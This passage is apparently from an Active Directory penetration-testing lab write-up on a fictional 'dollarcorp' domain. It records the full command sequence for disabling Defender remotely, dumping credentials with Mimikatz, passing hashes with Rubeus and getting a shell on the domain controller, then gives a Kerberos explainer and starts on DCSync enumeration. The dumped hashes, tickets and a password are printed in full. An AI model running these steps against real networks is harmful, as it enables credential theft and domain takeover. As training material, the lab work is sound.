rc4_hmac_nt b4cb7bf8b93c78b8051c7906bb054dc5
rc4_hmac_old b4cb7bf8b93c78b8051c7906bb054dc5
rc4_md4 b4cb7bf8b93c78b8051c7906bb054dc5
rc4_hmac_nt_exp b4cb7bf8b93c78b8051c7906bb054dc5
rc4_hmac_old_exp b4cb7bf8b93c78b8051c7906bb054dc5

mimikatz(powershell) # exit
Bye!

Even though from the output of the Find-DomainUserLocation we could see that there was a session of
Domain Admin "Administrator", we were not able to dump its hash.

srvadmin
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:srvadmin
/aes256:145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1dbb4 /opsec
/createnetonly:powershell.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True
[*] Username : 86KBZBOP
[*] Domain : AVUV5NKJ
[*] Password : 7TUUDOH6
[+] Process : 'powershell.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 5828
[+] LUID : 0xb54ff6

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)

[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsrvadmin
[*] Using aes256_cts_hmac_sha1 hash:
145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1dbb4
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\srvadmin'
[*] Target LUID : 11882486
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIF+jCCBfagAwIBBaEDAgEWooIE0TCCBM1hggTJMIIExaADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOC
BG0wggRpoAMCARKhAwIBAqKCBFsEggRXKbVfWrZFowxnficqtlA7WjVK4TybPUBSnNwBXFL9D2HDHFrV
ixm5aKZv1fGC9ZlHlg/o5Nde9ylUjZ2LiM7aUpguLysWtqrxwGYoJtMWGiFloCKeh3LOiKa4fB83Ei9S
NOkSDDg7/jls0nc2doRcAReSVEWO9n7QQowQ/SnOitXsXCJBoUTCNQpDi5KwOiKPh2aakwBIxZYM8ufq
OGc5rQXkx8k9TBiakUMbiU1cMaxXA/45SlvpkchvVbEeZeAvWm3I9QKQ37O083Ii9a0K1b0Y37WSbc1M
oEYvaCc/GQnkwWMRFOLrvtdup9HT2rSum+5rCfuSTuiYbkmxxp2CztEHKbfLt1d2Dm0VupnaMnCTgy3D
MNAg0gBzFBQZWzo3lRSjP5hxWQQW5KjXWb7280Kv5IQn5Sa4f9xUqlc5HZLSMECi7+QTAub54QbYrBqE
dXIZO0nSqJGhM+41VDri54KWycqc9dhRu7olLZ3TTX6w8kkUWC8ZQl0EE05faRXkMjKuxGDVEDvSmVpv
hWN4077nsQWICXbVn9E2VA/+46bZCkEhb3GPgin2u6Da30/5vcj1o9JcCvlfFY7xOz4NYnF50mO6U2Il
46hpdiNEXdH2GabS7cImrQ5UYURYHMzukjUKajrJ7YS+vYV/x/UVSYrHe7g7O9HSkkx5a5hUpoScvBWp
jMsHaS49Mge86fGK/N9rgowaXZgtNxRVE4Wr79oSM7zyya5DFmK8PVt7GZA4oBm7MIFaV8Fv1qGH35Uu
4ho2SgBTa5auxPWAY5FmRoAPSwuIvHS+k3+P4Lzk/TyucfTuv1Ez+kQ4CYc0srvST2rU6xHGX3u7Yk7Q
tLD2rXT3VdndecEACuKW9A7g3LJbTfvaJypIRTm/L/bbEoaNefmJkJKEodhd77v37PtwKpXgYMpy9V9I
lx0RzERHSrDgGYU60AiQAaavBzjiqKxn54Cjs/lP7ZX7uVy0m4Gu4eyuPvB9NcmXZGlZ4z8zmnMkaDqC
7X11PfBWKMNQPJ8Rki6CtEq4XvwRBXs4CX8Cn+QMGti5bm6dBqmtyCos97jYn8IuEBOlnWZecgtLz1g+
0XDNFjPaLR99roD5a8skM7iJL/eqyReE2Ja7GSGDVOWho9/hfPEqaB9r3e3s+4wuC7GUgygBykBkUA0G
qBNcP/q1q5oKNukBBKu+OXTkXZmJbrcpVvq8d+wgwzr5RnaJyRvzktqhX/EhTJ0lhDQsknY+FI4x0+75
X/Cm+CJG2WwBcRPCu5h5DA8urQq/d2t7UGyf7xczt2zSdMcnGpGViRNu0d4+WJqby1WXyx3Pr00dxK7m
sNlETIVdvgrjZrB2DD0g+CNFEMA9kZyibtV940/P3aIbzcM4eutNsvcCt1Ptav178+sbOO6Ncn0Ts8Q3
JE7xtWJUs7ihVKOhfU5DoVRGnUU22mLFV2uT66sHNShtOluiWRyr+hvP7IkGufc632YoipvBCqOCARMw
ggEPoAMCAQCiggEGBIIBAn2B/zCB/KCB+TCB9jCB86ArMCmgAwIBEqEiBCBKQLEsh31G2gI3XTGCZTjg
alCtUwJ4zG5utsPbmmhNtaEcGxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKIVMBOgAwIBAaEMMAob
CHNydmFkbWluowcDBQBA4QAApREYDzIwMjQwNjI3MDkyNDQzWqYRGA8yMDI0MDYyNzE5MjQ0M1qnERgP
MjAyNDA3MDQwOTI0NDNaqBwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMqS8wLaADAgECoSYwJBsG
a3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTA==
[*] Target LUID: 0xb54ff6
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : srvadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 6/27/2024 2:24:43 AM
EndTime : 6/27/2024 12:24:43 PM
RenewTill : 7/4/2024 2:24:43 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : SkCxLId9RtoCN10xgmU44GpQrVMCeMxubrbD25poTbU=
 ASREP (key) : 145019659E1DA3FB150ED94D510EB770276CFBD0CBD834A4AC331F2EFFE1DBB4

A new PowerShell Window opens.

PS C:\Windows\system32> . C:\Ad\Tools\PowerView.ps1
PS C:\Windows\system32> Find-DomainUserLocation -CheckAccess

UserDomain : dcorp
UserName : svcadmin
ComputerName : dcorp-mgmt.dollarcorp.moneycorp.local
IPAddress : 172.16.4.44
SessionFrom :
SessionFromName :
LocalAdmin :

There is a session of svcadmin(Domain Admin) on the machine DCORP-MGMT. We will now dump the
credentials from the machine DCORP-MGMT to see if we can obtain the hashes of the Domain Admin
"svcadmin".
PS C:\Windows\system32> . C:\Ad\Tools\Invoke-MimiEx_Modified.ps1
PS C:\Windows\system32> $Session = New-PSSession -ComputerName dcorp-mgmt
PS C:\Windows\system32> Invoke-Command -Session $Session -ScriptBlock {Set-MpPreference -
DisableRealtimeMonitoring $true}
PS C:\Windows\system32> Invoke-Command -Session $Session -ScriptBlock {Set-MpPreference -
DisableBehaviorMonitoring $true}
PS C:\Windows\system32> Invoke-Command -Session $Session -ScriptBlock {Set-MpPreference -
DisableIntrusionPreventionSystem $true}
PS C:\Windows\system32> Invoke-Command -Session $Session -ScriptBlock {Set-MpPreference -
DisableIOAVProtection $true}
PS C:\Windows\system32> Invoke-Command -Session $Session -ScriptBlock ${Function:Invoke-Mimi}

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # sekurlsa::ekeys

Authentication Id : 0 ; 56541 (00000000:0000dcdd)

Session : Service from 0
User Name : svcadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/21/2024 3:15:55 AM
SID : S-1-5-21-719815819-3726368948-3917688648-1118

* Username : svcadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : *ThisisBlasphemyThisisMadness!!
* Key List :
aes256_hmac 6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
aes128_hmac 8c0a8695795df6c9a85c4fb588ad6cbd
rc4_hmac_nt b38ff50264b74508085d82c69794a4d8
 rc4_hmac_old b38ff50264b74508085d82c69794a4d8
rc4_md4 b38ff50264b74508085d82c69794a4d8
rc4_hmac_nt_exp b38ff50264b74508085d82c69794a4d8
rc4_hmac_old_exp b38ff50264b74508085d82c69794a4d8

Authentication Id : 0 ; 54690 (00000000:0000d5a2)

Session : Service from 0
User Name : SQLTELEMETRY
Domain : NT Service
Logon Server : (null)
Logon Time : 2/21/2024 3:15:54 AM
SID : S-1-5-80-2652535364-2169709536-2857650723-2622804123-1107741775

* Username : DCORP-MGMT$
* Domain : dollarcorp.moneycorp.local
* Password :
4?PhChKP(`?yW`E8=VM2QI13O!i*3Q?WVB"X)=>Il3=AczJ0^T!X]r&:&yG41`*/$^4+EeZ07?zF2Z3`:[Jd*F/z_P`p6B9XH
^g$*mXIQMXY(Sc?3\A6ICrX
* Key List :
aes256_hmac c71f382ea61f80cab751aada32a477b7f9617f3b4a8628dc1c8757db5fdb5076
aes128_hmac b3b9f96ed137fb4c079dcfe2e23f7854
rc4_hmac_nt 0878da540f45b31b974f73312c18e754
rc4_hmac_old 0878da540f45b31b974f73312c18e754
rc4_md4 0878da540f45b31b974f73312c18e754
rc4_hmac_nt_exp 0878da540f45b31b974f73312c18e754
rc4_hmac_old_exp 0878da540f45b31b974f73312c18e754

Authentication Id : 0 ; 996 (00000000:000003e4)

Session : Service from 0
User Name : DCORP-MGMT$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/21/2024 3:15:49 AM
SID : S-1-5-20

* Username : dcorp-mgmt$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac b607d794f87ca117a14353da0dbb6f27bbe9fed4f1ce1b810b43fbb9a2eab192
rc4_hmac_nt 0878da540f45b31b974f73312c18e754
rc4_hmac_old 0878da540f45b31b974f73312c18e754
rc4_md4 0878da540f45b31b974f73312c18e754
rc4_hmac_nt_exp 0878da540f45b31b974f73312c18e754
rc4_hmac_old_exp 0878da540f45b31b974f73312c18e754

Authentication Id : 0 ; 20862 (00000000:0000517e)

Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/21/2024 3:15:49 AM
SID : S-1-5-96-0-0

* Username : DCORP-MGMT$
* Domain : dollarcorp.moneycorp.local
* Password :
4?PhChKP(`?yW`E8=VM2QI13O!i*3Q?WVB"X)=>Il3=AczJ0^T!X]r&:&yG41`*/$^4+EeZ07?zF2Z3`:[Jd*F/z_P`p6B9XH
^g$*mXIQMXY(Sc?3\A6ICrX
 * Key List :
aes256_hmac c71f382ea61f80cab751aada32a477b7f9617f3b4a8628dc1c8757db5fdb5076
aes128_hmac b3b9f96ed137fb4c079dcfe2e23f7854
rc4_hmac_nt 0878da540f45b31b974f73312c18e754
rc4_hmac_old 0878da540f45b31b974f73312c18e754
rc4_md4 0878da540f45b31b974f73312c18e754
rc4_hmac_nt_exp 0878da540f45b31b974f73312c18e754
rc4_hmac_old_exp 0878da540f45b31b974f73312c18e754

Authentication Id : 0 ; 1027589 (00000000:000fae05)

Session : Interactive from 0
User Name : mgmtadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/21/2024 3:57:38 AM
SID : S-1-5-21-719815819-3726368948-3917688648-1120

* Username : mgmtadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 902129307ec94942b00c6b9d866c67a2376f596bc9bdcf5f85ea83176f97c3aa
rc4_hmac_nt 95e2cd7ff77379e34c6e46265e75d754
rc4_hmac_old 95e2cd7ff77379e34c6e46265e75d754
rc4_md4 95e2cd7ff77379e34c6e46265e75d754
rc4_hmac_nt_exp 95e2cd7ff77379e34c6e46265e75d754
rc4_hmac_old_exp 95e2cd7ff77379e34c6e46265e75d754

Authentication Id : 0 ; 359605 (00000000:00057cb5)

Session : RemoteInteractive from 2
User Name : mgmtadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/21/2024 3:25:49 AM
SID : S-1-5-21-719815819-3726368948-3917688648-1120

* Username : mgmtadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 902129307ec94942b00c6b9d866c67a2376f596bc9bdcf5f85ea83176f97c3aa
rc4_hmac_nt 95e2cd7ff77379e34c6e46265e75d754
rc4_hmac_old 95e2cd7ff77379e34c6e46265e75d754
rc4_md4 95e2cd7ff77379e34c6e46265e75d754
rc4_hmac_nt_exp 95e2cd7ff77379e34c6e46265e75d754
rc4_hmac_old_exp 95e2cd7ff77379e34c6e46265e75d754

Authentication Id : 0 ; 288282 (00000000:0004661a)

Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/21/2024 3:20:28 AM
SID : S-1-5-96-0-2

* Username : DCORP-MGMT$
* Domain : dollarcorp.moneycorp.local
 * Password :
4?PhChKP(`?yW`E8=VM2QI13O!i*3Q?WVB"X)=>Il3=AczJ0^T!X]r&:&yG41`*/$^4+EeZ07?zF2Z3`:[Jd*F/z_P`p6B9XH
^g$*mXIQMXY(Sc?3\A6ICrX
* Key List :
aes256_hmac c71f382ea61f80cab751aada32a477b7f9617f3b4a8628dc1c8757db5fdb5076
aes128_hmac b3b9f96ed137fb4c079dcfe2e23f7854
rc4_hmac_nt 0878da540f45b31b974f73312c18e754
rc4_hmac_old 0878da540f45b31b974f73312c18e754
rc4_md4 0878da540f45b31b974f73312c18e754
rc4_hmac_nt_exp 0878da540f45b31b974f73312c18e754
rc4_hmac_old_exp 0878da540f45b31b974f73312c18e754

Authentication Id : 0 ; 20803 (00000000:00005143)

Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/21/2024 3:15:49 AM
SID : S-1-5-96-0-1

* Username : DCORP-MGMT$
* Domain : dollarcorp.moneycorp.local
* Password :
4?PhChKP(`?yW`E8=VM2QI13O!i*3Q?WVB"X)=>Il3=AczJ0^T!X]r&:&yG41`*/$^4+EeZ07?zF2Z3`:[Jd*F/z_P`p6B9XH
^g$*mXIQMXY(Sc?3\A6ICrX
* Key List :
aes256_hmac c71f382ea61f80cab751aada32a477b7f9617f3b4a8628dc1c8757db5fdb5076
aes128_hmac b3b9f96ed137fb4c079dcfe2e23f7854
rc4_hmac_nt 0878da540f45b31b974f73312c18e754
rc4_hmac_old 0878da540f45b31b974f73312c18e754
rc4_md4 0878da540f45b31b974f73312c18e754
rc4_hmac_nt_exp 0878da540f45b31b974f73312c18e754
rc4_hmac_old_exp 0878da540f45b31b974f73312c18e754

Authentication Id : 0 ; 999 (00000000:000003e7)

Session : UndefinedLogonType from 0
User Name : DCORP-MGMT$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/21/2024 3:15:48 AM
SID : S-1-5-18

* Username : dcorp-mgmt$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac b607d794f87ca117a14353da0dbb6f27bbe9fed4f1ce1b810b43fbb9a2eab192
rc4_hmac_nt 0878da540f45b31b974f73312c18e754
rc4_hmac_old 0878da540f45b31b974f73312c18e754
rc4_md4 0878da540f45b31b974f73312c18e754
rc4_hmac_nt_exp 0878da540f45b31b974f73312c18e754
rc4_hmac_old_exp 0878da540f45b31b974f73312c18e754

mimikatz(powershell) # exit
Bye!

We were able to dump the hashes of the domain administrator "svcadmin". We will run an OverPass the
Hash attack to get a command prompt with svcadmin privileges.
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:svcadmin
/aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec
/createnetonly:cmd.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True

[*] Username : KBP1CWK9
[*] Domain : 1M7RWTIY
[*] Password : QY1PO8FU
[+] Process : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 3488
[+] LUID : 0xbd126c

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)

[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash:
6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 12391020
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

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
[*] Target LUID: 0xbd126c
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 6/27/2024 3:05:12 AM
EndTime : 6/27/2024 1:05:12 PM
RenewTill : 7/4/2024 3:05:12 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : FCqu1+UUuUguW0xdngKapwNplCy7mQ46MvqCssH6ols=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011

A new Command Prompt opens. The following commands are entered in the new session.
C:\Windows\system32>set username
USERNAME=student163

C:\Windows\system32>set computername
COMPUTERNAME=DCORP-STD163

C:\Windows\system32>winrs -r:dcorp-dc.dollarcorp.moneycorp.local whoami

dcorp\svcadmin

C:\Windows\system32>winrs -r:dcorp-dc.dollarcorp.moneycorp.local hostname

dcorp-dc

C:\Windows\system32>winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd.exe

Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.

C:\Users\svcadmin>set username
set username
USERNAME=svcadmin

C:\Users\svcadmin>set computername
set computername
COMPUTERNAME=DCORP-DC
Domain Persistence
Introduction to Kerberos
Kerberos is a network authentication protocol designed to provide secure authentication for users and
services in a computer network. Developed at the Massachusetts Institute of Technology (MIT), Kerberos
is widely used in various operating systems, including Windows, UNIX, and Linux, to manage network
security.

Key Concepts of Kerberos

Authentication
Kerberos is primarily used to authenticate users and services in a secure manner, ensuring that both
parties in a communication are who they claim to be.

Tickets
Kerberos uses tickets to grant access to services. A ticket is a time-stamped token that proves the identity
of a user. Tickets are issued by the Key Distribution Center (KDC).

Key Distribution Center (KDC)

The KDC is a trusted third-party service that consists of two parts:

• Authentication Server (AS): Responsible for authenticating users and issuing Ticket Granting
Tickets (TGT).

• Ticket Granting Server (TGS): Issues service tickets based on the TGT provided by the user.

Ticket Granting Ticket (TGT)

A TGT is a special ticket issued by the Authentication Server after a user successfully authenticates. It
allows the user to request service tickets from the Ticket Granting Server without needing to re-enter
credentials.

Service Tickets
Service tickets are issued by the TGS and are used to access specific services within the network. Each
service ticket is encrypted with the service's secret key.
How Kerberos works

AS-REQ
Ticket request from the user contains timestamp encrypted with the user’s password. The Domain
Controller receives the request and since the domain controller has access to all the passwords, it can
decrypt the timestamp sent by the user and verifies if the timestamp is current.

AS-REP
The domain controller sends a User Ticket (TGT) and also a session key which is encrypted with the user’s
password. The TGT also contains the same session key. However, it is encrypted with the krbtgt’s
password. The TGT is also encrypted with the krbtgt’s password. The user receives both the TGT and the
session key. Since the user doesn’t have access to the krbtgt’s password, it cannot decrypt the TGT. The
user decrypts the session key since it is encrypted with the user’s password. The KRBTGT account is a
special account in Active Directory (AD) environments used by the Key Distribution Center (KDC) to
encrypt and sign all Kerberos tickets. The name "KRBTGT" stands for Kerberos Ticket Granting Ticket.
TGS-REQ
The user then sends a ticket request for the service to the domain controller. The ticket request contains
the user ticket (TGT) which the user received in the previous step (which could not be decrypted by the
user) and an authenticator which is encrypted with the session key obtained from the previous step. Now
the domain controller decrypts the TGT by using the krbtgt’s password and obtains the session key. It now
uses the session key to decrypt the authenticator sent by the user.

TGS-REP
The DC sends a service ticket and a new session key to the user. The new session key is also included in
the service ticket but it is encrypted with the service account’s password. The Domain Controller knows
which service account is responsible from the Service Principal Name (SPN). The service ticket is also
encrypted with the service account’s password. The new session key which is being sent separately along
with the service ticket is encrypted with the user’s password. The user receives the service ticket and the
new session key and it obtains the new session key by decrypting it. The user cannot decrypt the service
ticket since the user does not have access to the service account’s password.
AP-REQ
The user sends the service ticket (which the user could not decrypt) which it obtained in the previous step
along with an authenticator to the service which it needs access to. The authenticator is encrypted with
the new session key which it obtained in the previous step.
AP-REP
The service decrypts the service ticket using the service account’s password and obtains the session key
which it uses to decrypt the user’s authenticator. The user is now authenticated to the service.

DCSync attack
Organizations often have multiple Domain Controllers for its Active Directory as a backup or they have
different Domain Controllers for each location so that the authentication and other policies can be made
available locally on the site location. Now as there are multiple Domain Controllers in the organization it
is important that every Domain Controller is aware of every change made in the environment. These
changes are sync with each Domain Controller via Microsoft Directory Replication Service Remote
Protocol (MS-DRSR).

DCSync is a technique used to extract credentials from the Domain Controllers. In this attack, we mimic a
Domain Controller and leverage the (MS-DRSR) protocol and request for replication using GetNCChanges
function. In response to this the Domain Controller will return the replication data that includes password
hashes. This technique was added in Mimikatz tool in August 2015 by Benjamin Delpy and Vincent Le
Toux.

To perform DCSync attack we need the following rights on the Domain Object:

1. Replicating Directory Changes (DS-Replication-Get-Changes)

2. Replicating Directory Changes All (DS-Replication-Get-Changes-All)

3. Replicating Directory Changes in Filtered Set (DS-Replication-Get-Changes-In-Filtered-Set) (this

one isn’t always needed but we can add it just in case)

Generally, members of Administrators, Domain Admins, or Enterprise Admins as well as Domain

Controller computer accounts by default have the above rights.

However, in an incorrectly configured environment it may be possible to hunt down users who have the
required individual permissions without being in any of the aforementioned groups. These individual
permissions are:

• Replicating Directory Changes

• Replicating Directory Changes All

• Replicating Directory Changes in Filtered Set

Enumeration
The following commands can be used with PowerView to enumerate for users with the required rights.
PS C:\Windows\system32> Get-ObjectACL "DC=dollarcorp,DC=moneycorp,DC=local" -ResolveGUIDs |
foreach {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName
$_.SecurityIdentifier);$_} | ? { ($_.ActiveDirectoryRights -match 'GenericAll') -or
($_.ObjectAceType -match 'Replication-Get') }

AceQualifier : AccessAllowed
ObjectDN : DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : DS-Replication-Get-Changes
ObjectSID : S-1-5-21-719815819-3726368948-3917688648
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-335606122-960912869-3279953914-498
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : mcorp\Enterprise Read-only Domain Controllers

AceQualifier : AccessAllowed
ObjectDN : DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : DS-Replication-Get-Changes-All
ObjectSID : S-1-5-21-719815819-3726368948-3917688648
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-516
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : dcorp\Domain Controllers

AceQualifier : AccessAllowed
ObjectDN : DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : DS-Replication-Get-Changes-In-Filtered-Set
ObjectSID : S-1-5-21-719815819-3726368948-3917688648
InheritanceFlags : None
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-544
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : BUILTIN\Administrators

AceQualifier : AccessAllowed
ObjectDN : DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : DS-Replication-Get-Changes
ObjectSID : S-1-5-21-719815819-3726368948-3917688648
InheritanceFlags : None
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-544
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : BUILTIN\Administrators

AceQualifier : AccessAllowed
ObjectDN : DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : DS-Replication-Get-Changes-All
ObjectSID : S-1-5-21-719815819-3726368948-3917688648
InheritanceFlags : None
BinaryLength : 44
